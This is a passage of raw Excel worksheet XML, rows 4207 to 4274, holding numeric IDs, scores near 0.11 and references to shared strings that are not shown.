        <v>1.0</v>
      </c>
      <c r="E4207" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4207" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4208" ht="15.75" customHeight="1">
      <c r="A4208" s="1">
        <v>19522.0</v>
      </c>
      <c r="B4208" s="2">
        <v>5.5966258E7</v>
      </c>
      <c r="C4208" s="2" t="s">
        <v>4001</v>
      </c>
      <c r="D4208" s="2">
        <v>1.0</v>
      </c>
      <c r="E4208" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4208" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4209" ht="15.75" customHeight="1">
      <c r="A4209" s="1">
        <v>19912.0</v>
      </c>
      <c r="B4209" s="2">
        <v>5.7367789E7</v>
      </c>
      <c r="C4209" s="2" t="s">
        <v>4002</v>
      </c>
      <c r="D4209" s="2">
        <v>1.0</v>
      </c>
      <c r="E4209" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4209" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4210" ht="15.75" customHeight="1">
      <c r="A4210" s="1">
        <v>20109.0</v>
      </c>
      <c r="B4210" s="2">
        <v>9967211.0</v>
      </c>
      <c r="C4210" s="2" t="s">
        <v>4003</v>
      </c>
      <c r="D4210" s="2">
        <v>1.0</v>
      </c>
      <c r="E4210" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4210" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4211" ht="15.75" customHeight="1">
      <c r="A4211" s="1">
        <v>20759.0</v>
      </c>
      <c r="B4211" s="2">
        <v>1.4911163E7</v>
      </c>
      <c r="C4211" s="2" t="s">
        <v>4004</v>
      </c>
      <c r="D4211" s="2">
        <v>1.0</v>
      </c>
      <c r="E4211" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4211" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4212" ht="15.75" customHeight="1">
      <c r="A4212" s="1">
        <v>21022.0</v>
      </c>
      <c r="B4212" s="2">
        <v>1.7423937E7</v>
      </c>
      <c r="C4212" s="2" t="s">
        <v>4005</v>
      </c>
      <c r="D4212" s="2">
        <v>1.0</v>
      </c>
      <c r="E4212" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4212" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4213" ht="15.75" customHeight="1">
      <c r="A4213" s="1">
        <v>22119.0</v>
      </c>
      <c r="B4213" s="2">
        <v>3.0991305E7</v>
      </c>
      <c r="C4213" s="2" t="s">
        <v>4006</v>
      </c>
      <c r="D4213" s="2">
        <v>1.0</v>
      </c>
      <c r="E4213" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4213" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4214" ht="15.75" customHeight="1">
      <c r="A4214" s="1">
        <v>24374.0</v>
      </c>
      <c r="B4214" s="2">
        <v>1.0762641E7</v>
      </c>
      <c r="C4214" s="2" t="s">
        <v>4007</v>
      </c>
      <c r="D4214" s="2">
        <v>1.0</v>
      </c>
      <c r="E4214" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4214" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4215" ht="15.75" customHeight="1">
      <c r="A4215" s="1">
        <v>24533.0</v>
      </c>
      <c r="B4215" s="2">
        <v>1.1208273E7</v>
      </c>
      <c r="C4215" s="2" t="s">
        <v>4008</v>
      </c>
      <c r="D4215" s="2">
        <v>1.0</v>
      </c>
      <c r="E4215" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4215" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4216" ht="15.75" customHeight="1">
      <c r="A4216" s="1">
        <v>26752.0</v>
      </c>
      <c r="B4216" s="2">
        <v>1.8397296E7</v>
      </c>
      <c r="C4216" s="2" t="s">
        <v>4009</v>
      </c>
      <c r="D4216" s="2">
        <v>1.0</v>
      </c>
      <c r="E4216" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4216" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4217" ht="15.75" customHeight="1">
      <c r="A4217" s="1">
        <v>27019.0</v>
      </c>
      <c r="B4217" s="2">
        <v>2.0036703E7</v>
      </c>
      <c r="C4217" s="2" t="s">
        <v>4010</v>
      </c>
      <c r="D4217" s="2">
        <v>1.0</v>
      </c>
      <c r="E4217" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4217" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4218" ht="15.75" customHeight="1">
      <c r="A4218" s="1">
        <v>27139.0</v>
      </c>
      <c r="B4218" s="2">
        <v>2.0767257E7</v>
      </c>
      <c r="C4218" s="2" t="s">
        <v>4011</v>
      </c>
      <c r="D4218" s="2">
        <v>1.0</v>
      </c>
      <c r="E4218" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4218" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4219" ht="15.75" customHeight="1">
      <c r="A4219" s="1">
        <v>27369.0</v>
      </c>
      <c r="B4219" s="2">
        <v>2.1681191E7</v>
      </c>
      <c r="C4219" s="2" t="s">
        <v>4012</v>
      </c>
      <c r="D4219" s="2">
        <v>1.0</v>
      </c>
      <c r="E4219" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4219" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4220" ht="15.75" customHeight="1">
      <c r="A4220" s="1">
        <v>28902.0</v>
      </c>
      <c r="B4220" s="2">
        <v>2.9381033E7</v>
      </c>
      <c r="C4220" s="2" t="s">
        <v>4013</v>
      </c>
      <c r="D4220" s="2">
        <v>1.0</v>
      </c>
      <c r="E4220" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4220" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4221" ht="15.75" customHeight="1">
      <c r="A4221" s="1">
        <v>29142.0</v>
      </c>
      <c r="B4221" s="2">
        <v>3.0559703E7</v>
      </c>
      <c r="C4221" s="2" t="s">
        <v>4014</v>
      </c>
      <c r="D4221" s="2">
        <v>1.0</v>
      </c>
      <c r="E4221" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4221" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4222" ht="15.75" customHeight="1">
      <c r="A4222" s="1">
        <v>29143.0</v>
      </c>
      <c r="B4222" s="2">
        <v>3.0559715E7</v>
      </c>
      <c r="C4222" s="2" t="s">
        <v>4015</v>
      </c>
      <c r="D4222" s="2">
        <v>1.0</v>
      </c>
      <c r="E4222" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4222" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4223" ht="15.75" customHeight="1">
      <c r="A4223" s="1">
        <v>29267.0</v>
      </c>
      <c r="B4223" s="2">
        <v>3.0991304E7</v>
      </c>
      <c r="C4223" s="2" t="s">
        <v>4006</v>
      </c>
      <c r="D4223" s="2">
        <v>1.0</v>
      </c>
      <c r="E4223" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4223" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4224" ht="15.75" customHeight="1">
      <c r="A4224" s="1">
        <v>30748.0</v>
      </c>
      <c r="B4224" s="2">
        <v>4.4136259E7</v>
      </c>
      <c r="C4224" s="2" t="s">
        <v>4016</v>
      </c>
      <c r="D4224" s="2">
        <v>1.0</v>
      </c>
      <c r="E4224" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4224" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4225" ht="15.75" customHeight="1">
      <c r="A4225" s="1">
        <v>30847.0</v>
      </c>
      <c r="B4225" s="2">
        <v>4.5881519E7</v>
      </c>
      <c r="C4225" s="2" t="s">
        <v>4017</v>
      </c>
      <c r="D4225" s="2">
        <v>1.0</v>
      </c>
      <c r="E4225" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4225" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4226" ht="15.75" customHeight="1">
      <c r="A4226" s="1">
        <v>31693.0</v>
      </c>
      <c r="B4226" s="2">
        <v>5192460.0</v>
      </c>
      <c r="C4226" s="2" t="s">
        <v>4018</v>
      </c>
      <c r="D4226" s="2">
        <v>1.0</v>
      </c>
      <c r="E4226" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4226" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4227" ht="15.75" customHeight="1">
      <c r="A4227" s="1">
        <v>31966.0</v>
      </c>
      <c r="B4227" s="2">
        <v>5314761.0</v>
      </c>
      <c r="C4227" s="2" t="s">
        <v>4019</v>
      </c>
      <c r="D4227" s="2">
        <v>1.0</v>
      </c>
      <c r="E4227" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4227" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4228" ht="15.75" customHeight="1">
      <c r="A4228" s="1">
        <v>32043.0</v>
      </c>
      <c r="B4228" s="2">
        <v>5369993.0</v>
      </c>
      <c r="C4228" s="2" t="s">
        <v>4020</v>
      </c>
      <c r="D4228" s="2">
        <v>1.0</v>
      </c>
      <c r="E4228" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4228" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4229" ht="15.75" customHeight="1">
      <c r="A4229" s="1">
        <v>34195.0</v>
      </c>
      <c r="B4229" s="2">
        <v>9974330.0</v>
      </c>
      <c r="C4229" s="2" t="s">
        <v>4021</v>
      </c>
      <c r="D4229" s="2">
        <v>1.0</v>
      </c>
      <c r="E4229" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4229" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4230" ht="15.75" customHeight="1">
      <c r="A4230" s="1">
        <v>104.0</v>
      </c>
      <c r="B4230" s="2">
        <v>1.2815043E7</v>
      </c>
      <c r="C4230" s="2" t="s">
        <v>4022</v>
      </c>
      <c r="D4230" s="2">
        <v>1.0</v>
      </c>
      <c r="E4230" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4230" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4231" ht="15.75" customHeight="1">
      <c r="A4231" s="1">
        <v>1624.0</v>
      </c>
      <c r="B4231" s="2">
        <v>2.7912471E7</v>
      </c>
      <c r="C4231" s="2" t="s">
        <v>4023</v>
      </c>
      <c r="D4231" s="2">
        <v>1.0</v>
      </c>
      <c r="E4231" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4231" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4232" ht="15.75" customHeight="1">
      <c r="A4232" s="1">
        <v>3760.0</v>
      </c>
      <c r="B4232" s="2">
        <v>3.9755785E7</v>
      </c>
      <c r="C4232" s="2" t="s">
        <v>4024</v>
      </c>
      <c r="D4232" s="2">
        <v>1.0</v>
      </c>
      <c r="E4232" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4232" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4233" ht="15.75" customHeight="1">
      <c r="A4233" s="1">
        <v>4430.0</v>
      </c>
      <c r="B4233" s="2">
        <v>4.2331758E7</v>
      </c>
      <c r="C4233" s="2" t="s">
        <v>4025</v>
      </c>
      <c r="D4233" s="2">
        <v>1.0</v>
      </c>
      <c r="E4233" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4233" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4234" ht="15.75" customHeight="1">
      <c r="A4234" s="1">
        <v>7070.0</v>
      </c>
      <c r="B4234" s="2">
        <v>5.0241627E7</v>
      </c>
      <c r="C4234" s="2" t="s">
        <v>4026</v>
      </c>
      <c r="D4234" s="2">
        <v>1.0</v>
      </c>
      <c r="E4234" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4234" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4235" ht="15.75" customHeight="1">
      <c r="A4235" s="1">
        <v>11641.0</v>
      </c>
      <c r="B4235" s="2">
        <v>2.3197758E7</v>
      </c>
      <c r="C4235" s="2" t="s">
        <v>4027</v>
      </c>
      <c r="D4235" s="2">
        <v>1.0</v>
      </c>
      <c r="E4235" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4235" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4236" ht="15.75" customHeight="1">
      <c r="A4236" s="1">
        <v>12919.0</v>
      </c>
      <c r="B4236" s="2">
        <v>3.2255776E7</v>
      </c>
      <c r="C4236" s="2" t="s">
        <v>4028</v>
      </c>
      <c r="D4236" s="2">
        <v>1.0</v>
      </c>
      <c r="E4236" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4236" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4237" ht="15.75" customHeight="1">
      <c r="A4237" s="1">
        <v>18114.0</v>
      </c>
      <c r="B4237" s="2">
        <v>5.1751214E7</v>
      </c>
      <c r="C4237" s="2" t="s">
        <v>4029</v>
      </c>
      <c r="D4237" s="2">
        <v>1.0</v>
      </c>
      <c r="E4237" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4237" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4238" ht="15.75" customHeight="1">
      <c r="A4238" s="1">
        <v>19333.0</v>
      </c>
      <c r="B4238" s="2">
        <v>5.5341131E7</v>
      </c>
      <c r="C4238" s="2" t="s">
        <v>4030</v>
      </c>
      <c r="D4238" s="2">
        <v>1.0</v>
      </c>
      <c r="E4238" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4238" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4239" ht="15.75" customHeight="1">
      <c r="A4239" s="1">
        <v>19698.0</v>
      </c>
      <c r="B4239" s="2">
        <v>5.6494143E7</v>
      </c>
      <c r="C4239" s="2" t="s">
        <v>4031</v>
      </c>
      <c r="D4239" s="2">
        <v>1.0</v>
      </c>
      <c r="E4239" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4239" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="4240" ht="15.75" customHeight="1">
      <c r="A4240" s="1">
        <v>129.0</v>
      </c>
      <c r="B4240" s="2">
        <v>1.3219792E7</v>
      </c>
      <c r="C4240" s="2" t="s">
        <v>4032</v>
      </c>
      <c r="D4240" s="2">
        <v>1.0</v>
      </c>
      <c r="E4240" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4240" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4241" ht="15.75" customHeight="1">
      <c r="A4241" s="1">
        <v>1622.0</v>
      </c>
      <c r="B4241" s="2">
        <v>2.7910367E7</v>
      </c>
      <c r="C4241" s="2" t="s">
        <v>4033</v>
      </c>
      <c r="D4241" s="2">
        <v>1.0</v>
      </c>
      <c r="E4241" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4241" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4242" ht="15.75" customHeight="1">
      <c r="A4242" s="1">
        <v>3687.0</v>
      </c>
      <c r="B4242" s="2">
        <v>3.949152E7</v>
      </c>
      <c r="C4242" s="2" t="s">
        <v>4034</v>
      </c>
      <c r="D4242" s="2">
        <v>1.0</v>
      </c>
      <c r="E4242" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4242" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4243" ht="15.75" customHeight="1">
      <c r="A4243" s="1">
        <v>3761.0</v>
      </c>
      <c r="B4243" s="2">
        <v>3.9755785E7</v>
      </c>
      <c r="C4243" s="2" t="s">
        <v>4035</v>
      </c>
      <c r="D4243" s="2">
        <v>1.0</v>
      </c>
      <c r="E4243" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4243" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4244" ht="15.75" customHeight="1">
      <c r="A4244" s="1">
        <v>3961.0</v>
      </c>
      <c r="B4244" s="2">
        <v>4.0709564E7</v>
      </c>
      <c r="C4244" s="2" t="s">
        <v>4036</v>
      </c>
      <c r="D4244" s="2">
        <v>1.0</v>
      </c>
      <c r="E4244" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4244" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4245" ht="15.75" customHeight="1">
      <c r="A4245" s="1">
        <v>4377.0</v>
      </c>
      <c r="B4245" s="2">
        <v>4.2145566E7</v>
      </c>
      <c r="C4245" s="2" t="s">
        <v>4037</v>
      </c>
      <c r="D4245" s="2">
        <v>1.0</v>
      </c>
      <c r="E4245" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4245" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4246" ht="15.75" customHeight="1">
      <c r="A4246" s="1">
        <v>5462.0</v>
      </c>
      <c r="B4246" s="2">
        <v>4.5665643E7</v>
      </c>
      <c r="C4246" s="2" t="s">
        <v>4038</v>
      </c>
      <c r="D4246" s="2">
        <v>1.0</v>
      </c>
      <c r="E4246" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4246" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4247" ht="15.75" customHeight="1">
      <c r="A4247" s="1">
        <v>6138.0</v>
      </c>
      <c r="B4247" s="2">
        <v>4.781831E7</v>
      </c>
      <c r="C4247" s="2" t="s">
        <v>4039</v>
      </c>
      <c r="D4247" s="2">
        <v>1.0</v>
      </c>
      <c r="E4247" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4247" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4248" ht="15.75" customHeight="1">
      <c r="A4248" s="1">
        <v>7448.0</v>
      </c>
      <c r="B4248" s="2">
        <v>5.1226733E7</v>
      </c>
      <c r="C4248" s="2" t="s">
        <v>4040</v>
      </c>
      <c r="D4248" s="2">
        <v>1.0</v>
      </c>
      <c r="E4248" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4248" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4249" ht="15.75" customHeight="1">
      <c r="A4249" s="1">
        <v>10057.0</v>
      </c>
      <c r="B4249" s="2">
        <v>5.7121611E7</v>
      </c>
      <c r="C4249" s="2" t="s">
        <v>4041</v>
      </c>
      <c r="D4249" s="2">
        <v>1.0</v>
      </c>
      <c r="E4249" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4249" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4250" ht="15.75" customHeight="1">
      <c r="A4250" s="1">
        <v>10977.0</v>
      </c>
      <c r="B4250" s="2">
        <v>1.7336646E7</v>
      </c>
      <c r="C4250" s="2" t="s">
        <v>4042</v>
      </c>
      <c r="D4250" s="2">
        <v>1.0</v>
      </c>
      <c r="E4250" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4250" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4251" ht="15.75" customHeight="1">
      <c r="A4251" s="1">
        <v>11180.0</v>
      </c>
      <c r="B4251" s="2">
        <v>1.9738024E7</v>
      </c>
      <c r="C4251" s="2" t="s">
        <v>4043</v>
      </c>
      <c r="D4251" s="2">
        <v>1.0</v>
      </c>
      <c r="E4251" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4251" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4252" ht="15.75" customHeight="1">
      <c r="A4252" s="1">
        <v>13191.0</v>
      </c>
      <c r="B4252" s="2">
        <v>3.4085883E7</v>
      </c>
      <c r="C4252" s="2" t="s">
        <v>4044</v>
      </c>
      <c r="D4252" s="2">
        <v>1.0</v>
      </c>
      <c r="E4252" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4252" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4253" ht="15.75" customHeight="1">
      <c r="A4253" s="1">
        <v>17194.0</v>
      </c>
      <c r="B4253" s="2">
        <v>4.8947406E7</v>
      </c>
      <c r="C4253" s="2" t="s">
        <v>4045</v>
      </c>
      <c r="D4253" s="2">
        <v>1.0</v>
      </c>
      <c r="E4253" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4253" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4254" ht="15.75" customHeight="1">
      <c r="A4254" s="1">
        <v>18197.0</v>
      </c>
      <c r="B4254" s="2">
        <v>5.2035839E7</v>
      </c>
      <c r="C4254" s="2" t="s">
        <v>4046</v>
      </c>
      <c r="D4254" s="2">
        <v>1.0</v>
      </c>
      <c r="E4254" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4254" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4255" ht="15.75" customHeight="1">
      <c r="A4255" s="1">
        <v>28458.0</v>
      </c>
      <c r="B4255" s="2">
        <v>2.6606441E7</v>
      </c>
      <c r="C4255" s="2" t="s">
        <v>4047</v>
      </c>
      <c r="D4255" s="2">
        <v>1.0</v>
      </c>
      <c r="E4255" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4255" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4256" ht="15.75" customHeight="1">
      <c r="A4256" s="1">
        <v>32398.0</v>
      </c>
      <c r="B4256" s="2">
        <v>5627572.0</v>
      </c>
      <c r="C4256" s="2" t="s">
        <v>4048</v>
      </c>
      <c r="D4256" s="2">
        <v>1.0</v>
      </c>
      <c r="E4256" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4256" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4257" ht="15.75" customHeight="1">
      <c r="A4257" s="1">
        <v>33366.0</v>
      </c>
      <c r="B4257" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C4257" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="D4257" s="2">
        <v>1.0</v>
      </c>
      <c r="E4257" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4257" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="4258" ht="15.75" customHeight="1">
      <c r="A4258" s="1">
        <v>117.0</v>
      </c>
      <c r="B4258" s="2">
        <v>1.2995229E7</v>
      </c>
      <c r="C4258" s="2" t="s">
        <v>4050</v>
      </c>
      <c r="D4258" s="2">
        <v>1.0</v>
      </c>
      <c r="E4258" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4258" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4259" ht="15.75" customHeight="1">
      <c r="A4259" s="1">
        <v>1486.0</v>
      </c>
      <c r="B4259" s="2">
        <v>2.7170723E7</v>
      </c>
      <c r="C4259" s="2" t="s">
        <v>4051</v>
      </c>
      <c r="D4259" s="2">
        <v>1.0</v>
      </c>
      <c r="E4259" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4259" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4260" ht="15.75" customHeight="1">
      <c r="A4260" s="1">
        <v>1917.0</v>
      </c>
      <c r="B4260" s="2">
        <v>3.0038431E7</v>
      </c>
      <c r="C4260" s="2" t="s">
        <v>4052</v>
      </c>
      <c r="D4260" s="2">
        <v>1.0</v>
      </c>
      <c r="E4260" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4260" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4261" ht="15.75" customHeight="1">
      <c r="A4261" s="1">
        <v>2205.0</v>
      </c>
      <c r="B4261" s="2">
        <v>3.2072929E7</v>
      </c>
      <c r="C4261" s="2" t="s">
        <v>4053</v>
      </c>
      <c r="D4261" s="2">
        <v>1.0</v>
      </c>
      <c r="E4261" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4261" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4262" ht="15.75" customHeight="1">
      <c r="A4262" s="1">
        <v>2593.0</v>
      </c>
      <c r="B4262" s="2">
        <v>3.4355651E7</v>
      </c>
      <c r="C4262" s="2" t="s">
        <v>4054</v>
      </c>
      <c r="D4262" s="2">
        <v>1.0</v>
      </c>
      <c r="E4262" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4262" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4263" ht="15.75" customHeight="1">
      <c r="A4263" s="1">
        <v>7526.0</v>
      </c>
      <c r="B4263" s="2">
        <v>5.1444583E7</v>
      </c>
      <c r="C4263" s="2" t="s">
        <v>4055</v>
      </c>
      <c r="D4263" s="2">
        <v>1.0</v>
      </c>
      <c r="E4263" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4263" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4264" ht="15.75" customHeight="1">
      <c r="A4264" s="1">
        <v>11864.0</v>
      </c>
      <c r="B4264" s="2">
        <v>2.487605E7</v>
      </c>
      <c r="C4264" s="2" t="s">
        <v>4056</v>
      </c>
      <c r="D4264" s="2">
        <v>1.0</v>
      </c>
      <c r="E4264" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4264" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4265" ht="15.75" customHeight="1">
      <c r="A4265" s="1">
        <v>12340.0</v>
      </c>
      <c r="B4265" s="2">
        <v>2.8601425E7</v>
      </c>
      <c r="C4265" s="2" t="s">
        <v>4057</v>
      </c>
      <c r="D4265" s="2">
        <v>1.0</v>
      </c>
      <c r="E4265" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4265" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4266" ht="15.75" customHeight="1">
      <c r="A4266" s="1">
        <v>14446.0</v>
      </c>
      <c r="B4266" s="2">
        <v>3.9359544E7</v>
      </c>
      <c r="C4266" s="2" t="s">
        <v>4058</v>
      </c>
      <c r="D4266" s="2">
        <v>1.0</v>
      </c>
      <c r="E4266" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4266" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4267" ht="15.75" customHeight="1">
      <c r="A4267" s="1">
        <v>16066.0</v>
      </c>
      <c r="B4267" s="2">
        <v>4.5306531E7</v>
      </c>
      <c r="C4267" s="2" t="s">
        <v>4059</v>
      </c>
      <c r="D4267" s="2">
        <v>1.0</v>
      </c>
      <c r="E4267" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4267" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4268" ht="15.75" customHeight="1">
      <c r="A4268" s="1">
        <v>21534.0</v>
      </c>
      <c r="B4268" s="2">
        <v>2.3498777E7</v>
      </c>
      <c r="C4268" s="2" t="s">
        <v>4060</v>
      </c>
      <c r="D4268" s="2">
        <v>1.0</v>
      </c>
      <c r="E4268" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4268" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="4269" ht="15.75" customHeight="1">
      <c r="A4269" s="1">
        <v>12928.0</v>
      </c>
      <c r="B4269" s="2">
        <v>3.2319675E7</v>
      </c>
      <c r="C4269" s="2" t="s">
        <v>4061</v>
      </c>
      <c r="D4269" s="2">
        <v>1.0</v>
      </c>
      <c r="E4269" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4269" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="4270" ht="15.75" customHeight="1">
      <c r="A4270" s="1">
        <v>18715.0</v>
      </c>
      <c r="B4270" s="2">
        <v>5.3660235E7</v>
      </c>
      <c r="C4270" s="2" t="s">
        <v>4062</v>
      </c>
      <c r="D4270" s="2">
        <v>1.0</v>
      </c>
      <c r="E4270" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4270" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="4271" ht="15.75" customHeight="1">
      <c r="A4271" s="1">
        <v>4705.0</v>
      </c>
      <c r="B4271" s="2">
        <v>4.3251935E7</v>
      </c>
      <c r="C4271" s="2" t="s">
        <v>4063</v>
      </c>
      <c r="D4271" s="2">
        <v>1.0</v>
      </c>
      <c r="E4271" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4271" s="2">
        <v>0.1086601307189543</v>
      </c>
    </row>
    <row r="4272" ht="15.75" customHeight="1">
      <c r="A4272" s="1">
        <v>3869.0</v>
      </c>
      <c r="B4272" s="2">
        <v>4.0332365E7</v>
      </c>
      <c r="C4272" s="2" t="s">
        <v>4064</v>
      </c>
      <c r="D4272" s="2">
        <v>1.0</v>
      </c>
      <c r="E4272" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4272" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="4273" ht="15.75" customHeight="1">
      <c r="A4273" s="1">
        <v>31533.0</v>
      </c>
      <c r="B4273" s="2">
        <v>5094496.0</v>
      </c>
      <c r="C4273" s="2" t="s">
        <v>4065</v>
      </c>
      <c r="D4273" s="2">
        <v>1.0</v>
      </c>
      <c r="E4273" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4273" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="4274" ht="15.75" customHeight="1">
      <c r="A4274" s="1">
        <v>14113.0</v>
      </c>
      <c r="B4274" s="2">
        <v>3.7781849E7</v>
      </c>
      <c r="C4274" s="2" t="s">
        <v>4066</v>
      </c>
      <c r="D4274" s="2">
        <v>1.0</v>
      </c>
